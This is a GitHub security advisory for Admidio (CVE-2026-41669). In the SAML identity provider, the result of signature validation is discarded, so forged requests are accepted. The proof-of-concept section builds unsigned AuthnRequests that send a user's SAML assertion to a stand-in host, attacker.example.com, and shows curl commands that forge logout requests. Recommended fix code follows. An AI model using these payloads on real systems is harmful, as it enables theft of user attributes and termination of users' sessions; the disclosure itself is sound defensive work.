GHSA-25CW-98HG-G3CG

Vulnerability from github – Published: 2026-04-29 21:56 – Updated: 2026-05-08 20:14
VLAI?
Summary
Admidio Ignores SAML Signature Validation Result, Processes Forged AuthnRequests and LogoutRequests
Details

Summary

The Admidio SAML Identity Provider implementation discards the return value of its validateSignature() method at both call sites (handleSSORequest() line 418 and handleSLORequest() line 613). The method returns error strings on failure rather than throwing exceptions, but the developer believed it would throw (per comments on lines 416 and 611). This means the smc_require_auth_signed configuration option is completely ineffective — unsigned or invalidly-signed SAML AuthnRequests and LogoutRequests are processed identically to properly signed ones.

Details

The validateSignature() method at src/SSO/Service/SAMLService.php:355 has three possible return paths:

// Line 355-392
public function validateSignature(SAMLClient $client, SamlMessage $message, bool $required = false): bool|string {
    global $gL10n;
    $certPem = $client->getValue('smc_x509_certificate');
    if (!$certPem) {
        if ($required) {
            return $gL10n->get('SYS_SSO_SAML_SIGNATURE_KEY_MISSING'); // Returns STRING, not throw
        } else {
            return false;
        }
    }
    // ...
    $signatureReader = $message->getSignature();
    if (is_null($signatureReader)) {
        if ($required) {
            return $gL10n->get('SYS_SSO_SAML_SIGNATURE_MISSING'); // Returns STRING, not throw
        } else {
            return false;
        }
    }
    try {
        $ok = $signatureReader->validate($key);
        if ($ok) {
            return true;
        } else {
            return $gL10n->get('SYS_SSO_SAML_SIGNATURE_FAILED'); // Returns STRING, not throw
        }
    } catch (Exception $ex) {
        return $gL10n->get('SYS_SSO_SAML_SIGNATURE_FAILED'); // Returns STRING, not throw
    }
}

Both call sites discard the return value entirely:

// Line 416-419 in handleSSORequest()
// Validate signatures. Will throw an exception    <-- INCORRECT COMMENT
if ($client->getValue('smc_require_auth_signed') || $client->getValue('smc_validate_signatures')) {
    $this->validateSignature($client, $request, $client->getValue('smc_require_auth_signed'));
    // Return value discarded — execution continues regardless of validation result
}

// Line 611-614 in handleSLORequest()
// Validate signatures. Will throw an exception    <-- INCORRECT COMMENT
if ($client->getValue('smc_require_auth_signed') || $client->getValue('smc_validate_signatures')) {
    $this->validateSignature($client, $request, $client->getValue('smc_require_auth_signed'));
    // Return value discarded — execution continues regardless of validation result
}

SSO exploitation path (for already-logged-in users): 1. modules/sso/index.php:92 routes to handleSSORequest() 2. Line 403: receiveMessage() parses SAML binding directly from HTTP GET/POST — no authentication required 3. Line 408-409: Entity ID extracted from the forged request's Issuer element, client config loaded 4. Line 417-419: Signature validation called but return value discarded — flow continues 5. Line 421: $gValidLogin is true for logged-in users, so login form is skipped 6. Lines 438-580: SAML Response built with user's real attributes (login, name, email, roles) and sent to the AssertionConsumerServiceURL from the forged request

SLO exploitation path: 1. modules/sso/index.php:94 routes to handleSLORequest() 2. Line 613: Signature validation discarded 3. Lines 621-629: User's session is deleted from the database and $gCurrentSession->logout() is called

PoC

# Prerequisites:
# - Admidio instance with SAML SSO enabled (sso_saml_enabled=1)
# - At least one registered SAML SP client with smc_require_auth_signed=true
# - A user with an active session (e.g., admin browsing the Admidio panel)

# 1. Generate an unsigned AuthnRequest impersonating a registered SP:
AUTHN_REQUEST=$(python3 -c "
import base64, zlib
req = '<samlp:AuthnRequest xmlns:samlp=\"urn:oasis:names:tc:SAML:2.0:protocol\" xmlns:saml=\"urn:oasis:names:tc:SAML:2.0:assertion\" ID=\"_fake123\" Version=\"2.0\" IssueInstant=\"2026-03-27T00:00:00Z\" AssertionConsumerServiceURL=\"https://attacker.example.com/acs\"><saml:Issuer>https://legitimate-sp.example.com/entity-id</saml:Issuer></samlp:AuthnRequest>'
print(base64.b64encode(zlib.compress(req.encode())[2:-4]).decode())
")

# 2. Send the unsigned request via HTTP-Redirect binding (GET):
# If a logged-in user's browser follows this link (e.g., via CSRF/social engineering),
# Admidio generates a signed SAML assertion with the user's PII and sends it
# to the attacker-controlled ACS URL.
curl -v "https://admidio.example.org/adm_program/modules/sso/index.php/saml/sso?SAMLRequest=${AUTHN_REQUEST}" \
  -b 'PHPSESSID=VICTIM_SESSION_COOKIE'

# Expected: Despite smc_require_auth_signed=true, the unsigned request is processed.
# The response contains a SAML assertion with the victim's attributes.

# 3. For SLO — forge a LogoutRequest to terminate a victim's session:
LOGOUT_REQUEST=$(python3 -c "
import base64, zlib
req = '<samlp:LogoutRequest xmlns:samlp=\"urn:oasis:names:tc:SAML:2.0:protocol\" xmlns:saml=\"urn:oasis:names:tc:SAML:2.0:assertion\" ID=\"_fake456\" Version=\"2.0\" IssueInstant=\"2026-03-27T00:00:00Z\"><saml:Issuer>https://legitimate-sp.example.com/entity-id</saml:Issuer><saml:NameID>victim@example.com</saml:NameID></samlp:LogoutRequest>'
print(base64.b64encode(zlib.compress(req.encode())[2:-4]).decode())
")

curl -v "https://admidio.example.org/adm_program/modules/sso/index.php/saml/slo?SAMLRequest=${LOGOUT_REQUEST}" \
  -b 'PHPSESSID=VICTIM_SESSION_COOKIE'

# Expected: Victim's session is terminated, logout cascaded to all registered SPs.

Impact

  • Signature enforcement bypass: The smc_require_auth_signed setting is entirely ineffective. Administrators who enable this setting believing it protects against forged requests have a false sense of security.
  • User attribute disclosure (SSO): When combined with the ability to specify an arbitrary AssertionConsumerServiceURL, an attacker can redirect a logged-in user's SAML assertion (containing login name, email, real name, role memberships) to an attacker-controlled endpoint.
  • Session termination (SLO): An attacker can forge LogoutRequests to terminate any user's Admidio session and trigger cascading single logout across all registered Service Providers, causing denial of service for targeted users.
  • Amplifies ACS URL injection: The signature requirement was the primary defense against unvalidated ACS URLs in AuthnRequests. Without signature enforcement, the ACS redirect becomes trivially exploitable via GET redirect binding (which bypasses SameSite=Lax cookie restrictions).

Recommended Fix

Check the return value of validateSignature() and throw on failure. In src/SSO/Service/SAMLService.php, fix both call sites:

// In handleSSORequest(), replace lines 416-419:
// Validate signatures
if ($client->getValue('smc_require_auth_signed') || $client->getValue('smc_validate_signatures')) {
    $result = $this->validateSignature($client, $request, (bool)$client->getValue('smc_require_auth_signed'));
    if ($result !== true && $result !== false) {
        // $result is an error message string — validation failed
        throw new Exception($result);
    }
}

// In handleSLORequest(), replace lines 611-614 with the same pattern:
if ($client->getValue('smc_require_auth_signed') || $client->getValue('smc_validate_signatures')) {
    $result = $this->validateSignature($client, $request, (bool)$client->getValue('smc_require_auth_signed'));
    if ($result !== true && $result !== false) {
        throw new Exception($result);
    }
}

Alternatively, refactor validateSignature() to throw exceptions on failure (matching the developer's original intent as documented in the comments), which would make both call sites correct as-is:

public function validateSignature(SAMLClient $client, SamlMessage $message, bool $required = false): bool {
    global $gL10n;
    $certPem = $client->getValue('smc_x509_certificate');
    if (!$certPem) {
        if ($required) {
            throw new Exception($gL10n->get('SYS_SSO_SAML_SIGNATURE_KEY_MISSING'));
        }
        return false;
    }
    // ... (same cert loading logic) ...
    $signatureReader = $message->getSignature();
    if (is_null($signatureReader)) {
        if ($required) {
            throw new Exception($gL10n->get('SYS_SSO_SAML_SIGNATURE_MISSING'));
        }
        return false;
    }
    try {
        if (!$signatureReader->validate($key)) {
            throw new Exception($gL10n->get('SYS_SSO_SAML_SIGNATURE_FAILED'));
        }
        return true;
    } catch (Exception $ex) {
        throw new Exception($gL10n->get('SYS_SSO_SAML_SIGNATURE_FAILED'));
    }
}
Severity ?
8.2 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.0.8"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "admidio/admidio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.0.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41669"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-29T21:56:13Z",
    "nvd_published_at": "2026-05-07T04:16:30Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe Admidio SAML Identity Provider implementation discards the return value of its `validateSignature()` method at both call sites (`handleSSORequest()` line 418 and `handleSLORequest()` line 613). The method returns error strings on failure rather than throwing exceptions, but the developer believed it would throw (per comments on lines 416 and 611). This means the `smc_require_auth_signed` configuration option is completely ineffective \u2014 unsigned or invalidly-signed SAML AuthnRequests and LogoutRequests are processed identically to properly signed ones.\n\n## Details\n\nThe `validateSignature()` method at `src/SSO/Service/SAMLService.php:355` has three possible return paths:\n\n```php\n// Line 355-392\npublic function validateSignature(SAMLClient $client, SamlMessage $message, bool $required = false): bool|string {\n    global $gL10n;\n    $certPem = $client-\u003egetValue(\u0027smc_x509_certificate\u0027);\n    if (!$certPem) {\n        if ($required) {\n            return $gL10n-\u003eget(\u0027SYS_SSO_SAML_SIGNATURE_KEY_MISSING\u0027); // Returns STRING, not throw\n        } else {\n            return false;\n        }\n    }\n    // ...\n    $signatureReader = $message-\u003egetSignature();\n    if (is_null($signatureReader)) {\n        if ($required) {\n            return $gL10n-\u003eget(\u0027SYS_SSO_SAML_SIGNATURE_MISSING\u0027); // Returns STRING, not throw\n        } else {\n            return false;\n        }\n    }\n    try {\n        $ok = $signatureReader-\u003evalidate($key);\n        if ($ok) {\n            return true;\n        } else {\n            return $gL10n-\u003eget(\u0027SYS_SSO_SAML_SIGNATURE_FAILED\u0027); // Returns STRING, not throw\n        }\n    } catch (Exception $ex) {\n        return $gL10n-\u003eget(\u0027SYS_SSO_SAML_SIGNATURE_FAILED\u0027); // Returns STRING, not throw\n    }\n}\n```\n\nBoth call sites discard the return value entirely:\n\n```php\n// Line 416-419 in handleSSORequest()\n// Validate signatures. Will throw an exception    \u003c-- INCORRECT COMMENT\nif ($client-\u003egetValue(\u0027smc_require_auth_signed\u0027) || $client-\u003egetValue(\u0027smc_validate_signatures\u0027)) {\n    $this-\u003evalidateSignature($client, $request, $client-\u003egetValue(\u0027smc_require_auth_signed\u0027));\n    // Return value discarded \u2014 execution continues regardless of validation result\n}\n\n// Line 611-614 in handleSLORequest()\n// Validate signatures. Will throw an exception    \u003c-- INCORRECT COMMENT\nif ($client-\u003egetValue(\u0027smc_require_auth_signed\u0027) || $client-\u003egetValue(\u0027smc_validate_signatures\u0027)) {\n    $this-\u003evalidateSignature($client, $request, $client-\u003egetValue(\u0027smc_require_auth_signed\u0027));\n    // Return value discarded \u2014 execution continues regardless of validation result\n}\n```\n\n**SSO exploitation path** (for already-logged-in users):\n1. `modules/sso/index.php:92` routes to `handleSSORequest()`\n2. Line 403: `receiveMessage()` parses SAML binding directly from HTTP GET/POST \u2014 no authentication required\n3. Line 408-409: Entity ID extracted from the forged request\u0027s Issuer element, client config loaded\n4. Line 417-419: Signature validation called but return value discarded \u2014 flow continues\n5. Line 421: `$gValidLogin` is true for logged-in users, so login form is skipped\n6. Lines 438-580: SAML Response built with user\u0027s real attributes (login, name, email, roles) and sent to the `AssertionConsumerServiceURL` from the forged request\n\n**SLO exploitation path**:\n1. `modules/sso/index.php:94` routes to `handleSLORequest()`\n2. Line 613: Signature validation discarded\n3. Lines 621-629: User\u0027s session is deleted from the database and `$gCurrentSession-\u003elogout()` is called\n\n## PoC\n\n```bash\n# Prerequisites:\n# - Admidio instance with SAML SSO enabled (sso_saml_enabled=1)\n# - At least one registered SAML SP client with smc_require_auth_signed=true\n# - A user with an active session (e.g., admin browsing the Admidio panel)\n\n# 1. Generate an unsigned AuthnRequest impersonating a registered SP:\nAUTHN_REQUEST=$(python3 -c \"\nimport base64, zlib\nreq = \u0027\u003csamlp:AuthnRequest xmlns:samlp=\\\"urn:oasis:names:tc:SAML:2.0:protocol\\\" xmlns:saml=\\\"urn:oasis:names:tc:SAML:2.0:assertion\\\" ID=\\\"_fake123\\\" Version=\\\"2.0\\\" IssueInstant=\\\"2026-03-27T00:00:00Z\\\" AssertionConsumerServiceURL=\\\"https://attacker.example.com/acs\\\"\u003e\u003csaml:Issuer\u003ehttps://legitimate-sp.example.com/entity-id\u003c/saml:Issuer\u003e\u003c/samlp:AuthnRequest\u003e\u0027\nprint(base64.b64encode(zlib.compress(req.encode())[2:-4]).decode())\n\")\n\n# 2. Send the unsigned request via HTTP-Redirect binding (GET):\n# If a logged-in user\u0027s browser follows this link (e.g., via CSRF/social engineering),\n# Admidio generates a signed SAML assertion with the user\u0027s PII and sends it\n# to the attacker-controlled ACS URL.\ncurl -v \"https://admidio.example.org/adm_program/modules/sso/index.php/saml/sso?SAMLRequest=${AUTHN_REQUEST}\" \\\n  -b \u0027PHPSESSID=VICTIM_SESSION_COOKIE\u0027\n\n# Expected: Despite smc_require_auth_signed=true, the unsigned request is processed.\n# The response contains a SAML assertion with the victim\u0027s attributes.\n\n# 3. For SLO \u2014 forge a LogoutRequest to terminate a victim\u0027s session:\nLOGOUT_REQUEST=$(python3 -c \"\nimport base64, zlib\nreq = \u0027\u003csamlp:LogoutRequest xmlns:samlp=\\\"urn:oasis:names:tc:SAML:2.0:protocol\\\" xmlns:saml=\\\"urn:oasis:names:tc:SAML:2.0:assertion\\\" ID=\\\"_fake456\\\" Version=\\\"2.0\\\" IssueInstant=\\\"2026-03-27T00:00:00Z\\\"\u003e\u003csaml:Issuer\u003ehttps://legitimate-sp.example.com/entity-id\u003c/saml:Issuer\u003e\u003csaml:NameID\u003evictim@example.com\u003c/saml:NameID\u003e\u003c/samlp:LogoutRequest\u003e\u0027\nprint(base64.b64encode(zlib.compress(req.encode())[2:-4]).decode())\n\")\n\ncurl -v \"https://admidio.example.org/adm_program/modules/sso/index.php/saml/slo?SAMLRequest=${LOGOUT_REQUEST}\" \\\n  -b \u0027PHPSESSID=VICTIM_SESSION_COOKIE\u0027\n\n# Expected: Victim\u0027s session is terminated, logout cascaded to all registered SPs.\n```\n\n## Impact\n\n- **Signature enforcement bypass**: The `smc_require_auth_signed` setting is entirely ineffective. Administrators who enable this setting believing it protects against forged requests have a false sense of security.\n- **User attribute disclosure (SSO)**: When combined with the ability to specify an arbitrary `AssertionConsumerServiceURL`, an attacker can redirect a logged-in user\u0027s SAML assertion (containing login name, email, real name, role memberships) to an attacker-controlled endpoint.\n- **Session termination (SLO)**: An attacker can forge LogoutRequests to terminate any user\u0027s Admidio session and trigger cascading single logout across all registered Service Providers, causing denial of service for targeted users.\n- **Amplifies ACS URL injection**: The signature requirement was the primary defense against unvalidated ACS URLs in AuthnRequests. Without signature enforcement, the ACS redirect becomes trivially exploitable via GET redirect binding (which bypasses SameSite=Lax cookie restrictions).\n\n## Recommended Fix\n\nCheck the return value of `validateSignature()` and throw on failure. In `src/SSO/Service/SAMLService.php`, fix both call sites:\n\n```php\n// In handleSSORequest(), replace lines 416-419:\n// Validate signatures\nif ($client-\u003egetValue(\u0027smc_require_auth_signed\u0027) || $client-\u003egetValue(\u0027smc_validate_signatures\u0027)) {\n    $result = $this-\u003evalidateSignature($client, $request, (bool)$client-\u003egetValue(\u0027smc_require_auth_signed\u0027));\n    if ($result !== true \u0026\u0026 $result !== false) {\n        // $result is an error message string \u2014 validation failed\n        throw new Exception($result);\n    }\n}\n\n// In handleSLORequest(), replace lines 611-614 with the same pattern:\nif ($client-\u003egetValue(\u0027smc_require_auth_signed\u0027) || $client-\u003egetValue(\u0027smc_validate_signatures\u0027)) {\n    $result = $this-\u003evalidateSignature($client, $request, (bool)$client-\u003egetValue(\u0027smc_require_auth_signed\u0027));\n    if ($result !== true \u0026\u0026 $result !== false) {\n        throw new Exception($result);\n    }\n}\n```\n\nAlternatively, refactor `validateSignature()` to throw exceptions on failure (matching the developer\u0027s original intent as documented in the comments), which would make both call sites correct as-is:\n\n```php\npublic function validateSignature(SAMLClient $client, SamlMessage $message, bool $required = false): bool {\n    global $gL10n;\n    $certPem = $client-\u003egetValue(\u0027smc_x509_certificate\u0027);\n    if (!$certPem) {\n        if ($required) {\n            throw new Exception($gL10n-\u003eget(\u0027SYS_SSO_SAML_SIGNATURE_KEY_MISSING\u0027));\n        }\n        return false;\n    }\n    // ... (same cert loading logic) ...\n    $signatureReader = $message-\u003egetSignature();\n    if (is_null($signatureReader)) {\n        if ($required) {\n            throw new Exception($gL10n-\u003eget(\u0027SYS_SSO_SAML_SIGNATURE_MISSING\u0027));\n        }\n        return false;\n    }\n    try {\n        if (!$signatureReader-\u003evalidate($key)) {\n            throw new Exception($gL10n-\u003eget(\u0027SYS_SSO_SAML_SIGNATURE_FAILED\u0027));\n        }\n        return true;\n    } catch (Exception $ex) {\n        throw new Exception($gL10n-\u003eget(\u0027SYS_SSO_SAML_SIGNATURE_FAILED\u0027));\n    }\n}\n```",
  "id": "GHSA-25cw-98hg-g3cg",
  "modified": "2026-05-08T20:14:26Z",
  "published": "2026-04-29T21:56:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Admidio/admidio/security/advisories/GHSA-25cw-98hg-g3cg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41669"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Admidio/admidio"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Admidio/admidio/releases/tag/v5.0.9"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Admidio Ignores SAML Signature Validation Result, Processes Forged AuthnRequests and LogoutRequests"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.